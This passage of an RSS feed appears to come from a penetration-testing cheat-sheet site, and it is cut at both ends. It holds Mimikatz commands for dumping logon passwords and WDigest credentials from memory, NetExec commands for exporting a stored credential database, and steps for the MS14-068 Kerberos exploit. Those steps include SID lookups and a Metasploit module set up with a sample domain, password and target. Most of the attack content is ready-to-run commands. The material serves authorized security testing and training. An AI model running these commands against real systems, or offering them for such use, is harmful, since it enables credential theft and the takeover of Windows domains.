&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="background-handler" class="anchored-heading"&gt;Background handler&lt;a class="heading-anchor" href="#background-handler" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;ExitOnSession : the handler will not exit if the meterpreter dies.&lt;/p&gt;</description></item><item><title>Mimikatz</title><link>https://bokkapig.pages.dev/refs/internal/cheatsheets/mimikatz-cheatsheet/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cheatsheets/mimikatz-cheatsheet/</guid><description>&lt;h2 id="summary" class="anchored-heading"&gt;Summary&lt;a class="heading-anchor" href="#summary" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#execute-commands"&gt;Execute commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#extract-passwords"&gt;Extract passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#lsa-protection-workaround"&gt;LSA Protection Workaround&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#mini-dump"&gt;Mini Dump&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#pass-the-hash"&gt;Pass The Hash&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#golden-ticket"&gt;Golden ticket&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#skeleton-key"&gt;Skeleton key&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#rdp-session-takeover"&gt;RDP Session Takeover&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#rdp-passwords"&gt;RDP Passwords&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#credential-manager--dpapi"&gt;Credential Manager &amp;amp; DPAPI&lt;/a&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="#chrome-cookies--credential"&gt;Chrome Cookies &amp;amp; Credential&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#task-scheduled-credentials"&gt;Task Scheduled credentials&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#vault"&gt;Vault&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;a href="#commands-list"&gt;Commands list&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#powershell-version"&gt;Powershell version&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="#references"&gt;References&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;figure class="writeup-figure"&gt;
 &lt;img src="http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png" alt="Data in memory" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;Data in memory&lt;/figcaption&gt;&lt;/figure&gt;&lt;h2 id="execute-commands" class="anchored-heading"&gt;Execute commands&lt;a class="heading-anchor" href="#execute-commands" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Only one command&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;temp&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;privilege::debug&amp;#34;&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;sekurlsa::logonpasswords&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;exit&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Mimikatz console (multiple commands)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;temp&lt;/span&gt;&lt;span class="p"&gt;\&lt;/span&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt; &lt;span class="c"&gt;# privilege::debug&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt; &lt;span class="c"&gt;# log&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt; &lt;span class="c"&gt;# sekurlsa::logonpasswords&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;mimikatz&lt;/span&gt; &lt;span class="c"&gt;# sekurlsa::wdigest&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="extract-passwords" class="anchored-heading"&gt;Extract passwords&lt;a class="heading-anchor" href="#extract-passwords" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.&lt;/p&gt;</description></item><item><title>Miscellaneous &amp; Tricks</title><link>https://bokkapig.pages.dev/refs/internal/cheatsheets/miscellaneous-tricks/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/cheatsheets/miscellaneous-tricks/</guid><description>&lt;p&gt;All the tricks that couldn&amp;rsquo;t be classified somewhere else.&lt;/p&gt;
&lt;h2 id="send-messages-to-other-users" class="anchored-heading"&gt;Send Messages to Other Users&lt;a class="heading-anchor" href="#send-messages-to-other-users" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Windows&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;msg&lt;/span&gt; &lt;span class="n"&gt;Swissky&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;SERVER&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;CRASHLAB&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Stop rebooting the XXXX service !&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;PS &lt;/span&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;msg&lt;/span&gt; &lt;span class="p"&gt;*&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;V&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;W&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;SERVER&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;CRASHLAB&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Hello all !&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;Linux&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;wall&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;Stop messing with the XXX service !&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;wall&lt;/span&gt; &lt;span class="n"&gt;-n&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;System will go down for 2 hours maintenance at 13:00 PM&amp;#34;&lt;/span&gt; &lt;span class="c"&gt;# &amp;#34;-n&amp;#34; only for root&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;who&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;write &lt;/span&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;pts&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="mf"&gt;2&lt;/span&gt; &lt;span class="c"&gt;# press Ctrl+D after typing the message. &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="netexec-credential-database" class="anchored-heading"&gt;NetExec Credential Database&lt;a class="heading-anchor" href="#netexec-credential-database" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;nxcdb&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;default&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;workspace&lt;/span&gt; &lt;span class="n"&gt;create&lt;/span&gt; &lt;span class="n"&gt;test&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;nxcdb&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;workspace&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;nxcdb&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;proto&lt;/span&gt; &lt;span class="n"&gt;smb&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;nxcdb&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;smb&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;creds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;nxcdb&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;)(&lt;/span&gt;&lt;span class="n"&gt;smb&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;export&lt;/span&gt; &lt;span class="n"&gt;creds&lt;/span&gt; &lt;span class="n"&gt;csv&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;tmp&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;creds&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;NetExec workspaces&lt;/p&gt;</description></item><item><title>MS14-068 Checksum Validation</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/cve/ms14-068/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/cve/ms14-068/</guid><description>&lt;p&gt;This exploit require to know the user SID, you can use &lt;code&gt;rpcclient&lt;/code&gt; to remotely get it or &lt;code&gt;wmi&lt;/code&gt; if you have an access on the machine.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;RPCClient&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;rpcclient&lt;/span&gt; &lt;span class="p"&gt;$&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;lookupnames&lt;/span&gt; &lt;span class="n"&gt;john&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;smith&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;john&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;smith&lt;/span&gt; &lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2923581646&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;3335815371&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2872905324&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1107&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;User&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;WMI&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;wmic&lt;/span&gt; &lt;span class="n"&gt;useraccount&lt;/span&gt; &lt;span class="n"&gt;get&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;sid&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Administrator&lt;/span&gt; &lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;3415849876&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;833628785&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5197346142&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;500&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Guest&lt;/span&gt; &lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;3415849876&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;833628785&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5197346142&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;501&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Administrator&lt;/span&gt; &lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;297520375&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2634728305&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5197346142&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;500&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Guest&lt;/span&gt; &lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;297520375&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2634728305&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5197346142&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;501&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;krbtgt&lt;/span&gt; &lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;297520375&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2634728305&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5197346142&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;502&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;lambda&lt;/span&gt; &lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;297520375&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2634728305&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5197346142&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1110&lt;/span&gt; 
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Powerview&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;Convert-NameToSid&lt;/span&gt; &lt;span class="nb"&gt;high-sec&lt;/span&gt;&lt;span class="n"&gt;-corp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;localkrbtgt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;S&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;5&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;21&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;2941561648&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;383941485&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;1389968811&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;502&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;netexec: &lt;code&gt;netexec ldap DC1.lab.local -u username -p password -k --get-sid&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Generate a ticket with &lt;code&gt;metasploit&lt;/code&gt; or &lt;code&gt;pykek&lt;/code&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Metasploit&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;auxiliary&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;admin&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;kerberos&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ms14_068_kerberos_checksum&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;Name&lt;/span&gt; &lt;span class="n"&gt;Current&lt;/span&gt; &lt;span class="n"&gt;Setting&lt;/span&gt; &lt;span class="n"&gt;Required&lt;/span&gt; &lt;span class="n"&gt;Description&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="p"&gt;----&lt;/span&gt; &lt;span class="p"&gt;---------------&lt;/span&gt; &lt;span class="p"&gt;--------&lt;/span&gt; &lt;span class="p"&gt;-----------&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;DOMAIN&lt;/span&gt; &lt;span class="n"&gt;LABDOMAIN&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;LOCAL&lt;/span&gt; &lt;span class="n"&gt;yes&lt;/span&gt; &lt;span class="n"&gt;The&lt;/span&gt; &lt;span class="n"&gt;Domain&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;upper&lt;/span&gt; &lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;Ex&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="n"&gt;DEMO&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;LOCAL&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;PASSWORD&lt;/span&gt; &lt;span class="n"&gt;P&lt;/span&gt;&lt;span class="nv"&gt;@ssw0rd&lt;/span&gt; &lt;span class="n"&gt;yes&lt;/span&gt; &lt;span class="n"&gt;The&lt;/span&gt; &lt;span class="n"&gt;Domain&lt;/span&gt; &lt;span class="n"&gt;User&lt;/span&gt; &lt;span class="n"&gt;password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;RHOSTS&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;yes&lt;/span&gt; &lt;span class="n"&gt;The&lt;/span&gt; &lt;span class="n"&gt;target&lt;/span&gt; &lt;span class="n"&gt;address&lt;/span&gt; &lt;span class="n"&gt;range&lt;/span&gt; &lt;span class="n"&gt;or&lt;/span&gt; &lt;span class="n"&gt;CIDR&lt;/span&gt; &lt;span class="n"&gt;identifier&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;RPORT&lt;/span&gt; &lt;span class="mf"&gt;88&lt;/span&gt; &lt;span class="n"&gt;yes&lt;/span&gt; &lt;span class="n"&gt;The&lt;/span&gt; &lt;span class="n"&gt;target&lt;/span&gt; &lt;span class="n"&gt;port&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;Timeout&lt;/span&gt; &lt;span class="mf"&gt;10&lt;/span&gt; &lt;span class="n"&gt;yes&lt;/span&gt; &lt;span class="n"&gt;The&lt;/span&gt; &lt;span class="n"&gt;TCP&lt;/span&gt; &lt;span class="n"&gt;timeout&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;establish&lt;/span&gt; &lt;span class="n"&gt;connection&lt;/span&gt; &lt;span class="n"&gt;and&lt;/span&gt; &lt;span class="n"&gt;read&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;USER&lt;/span&gt; &lt;span class="n"&gt;lambda&lt;/span&gt; &lt;span class="n"&gt;yes&lt;/span&gt; &lt;span class="n"&gt;The&lt;/span&gt; &lt;span class="n"&gt;Domain&lt;/span&gt; &lt;span class="n"&gt;User&lt;/span&gt;
